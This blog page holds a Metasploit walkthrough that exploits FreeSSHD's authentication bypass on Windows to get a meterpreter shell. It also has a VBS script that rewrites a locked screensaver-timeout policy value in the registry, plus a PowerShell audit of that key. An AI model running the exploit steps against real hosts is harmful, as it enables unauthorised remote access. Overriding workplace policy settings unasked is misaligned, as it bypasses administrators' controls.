JohnKlann / Posts tagged "hack"

Kali Linux: Hacking FreeSSHD on Windows to get a meterpreter shell

So I found an interesting exploit in Metasploit today, mainly out of boredom, and I figured I would share it here. Below you will find a step-by-step guide on how to use Metasploit to exploit FreeSSHD on Windows to get a meterpreter shell.

start: FreeSSHD on your Windows victim box and check for any custom ports.

start: msfconsole in Kali

search: ssh

copy: exploit/windows/ssh/freesshd_authbypass

run: use exploit/windows/ssh/freesshd_authbypass

run: show options

run: set RHOST [victim ip]

run: set RPORT [victim port running ssh]

run: set LHOST [host ip]

run: set LPORT [local listening port]

run: exploit

Note: This exploit uses a username list for the attack. If the user that the SSH service uses to authenticate is not in this list, this exploit won't work. However, there is an option you can set if you know the username or wish to guess at it.

ex: set USERNAME crazy_user123456789

Note: You can also always find larger username lists and add them to the list that Metasploit uses, located at “/opt/metasploit/apps/pro/msf3/data/wordlists/unix_users.txt”, or you can change this path to point at your own list using the option below:

ex: set USER_FILE /youpath/users.txt

Note: Kali of course has built-in wordlists, which you can find at the following location:

ex: /usr/share/dirbuster/wordlists/

Note: Once the exploit works you have a meterpreter shell :)

Solution: if you are trying to protect against this attack, use a complicated username or use Cygwin sshd for Windows operating systems instead.

jklann

How To: Change a registry key with VBS + User Input Screensaver Timeout Duration

So have you ever been working on a work computer where the screen saver timeout period is 15 minutes, and when you go to change it the properties box is grayed out? Well, there is good news: you can change this through the Windows registry. The following VBS script does just that for Windows XP, Windows Vista, and Windows 7.

Windows stores this time in seconds, so 3600 seconds equals 1 hour. This script uses an input box to allow the time to be adjusted based on your preference.

All you have to do is copy and paste the code into Notepad and save it as screensaver.vbs. That's it. Double-click the file and it will prompt you for a duration; click OK and your screensaver timeout duration has been adjusted. You can look at the screensaver properties and you will see the change. Another option is to view it in regedit if you feel so inclined.

A video demonstration will be provided shortly.

'System variables
Dim objShell, RegLocate, strUserInput
Set objShell = WScript.CreateObject("WScript.Shell")
'Creating the input box
strUserInput = InputBox( "Please enter Screen saver duration time out (3600 = 1 Hr) Default value is 900:" )

'Function to check for valid entries
Function InputCheck(strUserInput)
'keeps prompting until the input passes every check
Do
'stops without changing anything if Cancel was clicked (InputBox then returns Empty)
If IsEmpty(strUserInput) Then WScript.Quit
'checks to make sure that the input field is not blank and is a number
If Not IsNumeric(strUserInput) Then
'warning message box
MsgBox "Please enter a duration"
'checks to make sure that the input is not negative and is at least 900 seconds
ElseIf CDbl(strUserInput) < 900 Then
'warning message box
MsgBox "Please enter a valid duration minimum value of 900s = 15 minutes"
Else
Exit Do
End If
strUserInput = InputBox( "Please enter Screen saver duration time out (3600 = 1 Hr) Default value is 900:" )
Loop
'the input passed all checks, so this submits the change and updates the registry
On Error Resume Next
'selects the registry key to change
RegLocate = "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Control Panel\Desktop\ScreenSaveTimeOut"
'writes the registry Value and key with the registry value type
objShell.RegWrite RegLocate,strUserInput,"REG_SZ"
'Lets you know whether it worked (the write fails without permission on the key)
If Err.Number = 0 Then
MsgBox "Your Duration has Changed Successfully"
Else
MsgBox "Could not write the registry value: " & Err.Description
End If
On Error GoTo 0
'Ends the script
WScript.Quit
End Function
'Calls the function to run the script
Dim result
result = InputCheck(strUserInput)

jklann
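For administrators who want to see whether this value has drifted on a machine, here is an added audit example (not part of the original post or the author's script). It reads the same registry value the script writes and lists who is allowed to write to the key. The 900-second baseline comes from the post; the function name and the English account names in the trusted list are assumptions made for illustration. Run it in the session of the user being checked, since HKCU is per-user.

```powershell
# Added example: audit the per-user screensaver policy value and its write permissions.
# Assumption: the baseline is the 900-second (15-minute) timeout the post describes.
$KeyPath         = 'HKCU:\Software\Policies\Microsoft\Windows\Control Panel\Desktop'
$BaselineSeconds = 900

# Hypothetical helper name; returns one string per finding, nothing when all is well.
function Get-ScreenSaverPolicyFinding {
    param(
        [string]$Path = $KeyPath,
        [int]$MaxSeconds = $BaselineSeconds
    )
    $findings = New-Object System.Collections.Generic.List[string]

    if (-not (Test-Path -LiteralPath $Path)) {
        $findings.Add('Policy key not present: no timeout is enforced for this user')
        return $findings
    }

    # Read the value the VBS script writes and compare it with the baseline.
    $raw = (Get-ItemProperty -LiteralPath $Path).ScreenSaveTimeOut
    $seconds = 0
    if ($null -eq $raw) {
        $findings.Add('ScreenSaveTimeOut is not set under the policy key')
    } elseif (-not [int]::TryParse([string]$raw, [ref]$seconds)) {
        $findings.Add("ScreenSaveTimeOut is not a whole number: '$raw'")
    } elseif ($seconds -le 0 -or $seconds -gt $MaxSeconds) {
        $findings.Add("ScreenSaveTimeOut is $seconds s; baseline is 1 to $MaxSeconds s")
    }

    # A write ACE for an ordinary user is what lets a user-run script change the policy.
    # Assumption: English account names; adjust the trusted list for localized systems.
    $setValue = [System.Security.AccessControl.RegistryRights]::SetValue
    $trusted  = 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators'
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        $canWrite = ($ace.RegistryRights -band $setValue) -eq $setValue
        if ($ace.AccessControlType -eq 'Allow' -and $canWrite -and
            $trusted -notcontains $ace.IdentityReference.Value) {
            $findings.Add("Write access granted to $($ace.IdentityReference.Value)")
        }
    }
    return $findings
}

$result = @(Get-ScreenSaverPolicyFinding)
if ($result.Count -eq 0) { 'OK: screensaver policy matches the baseline' } else { $result }
```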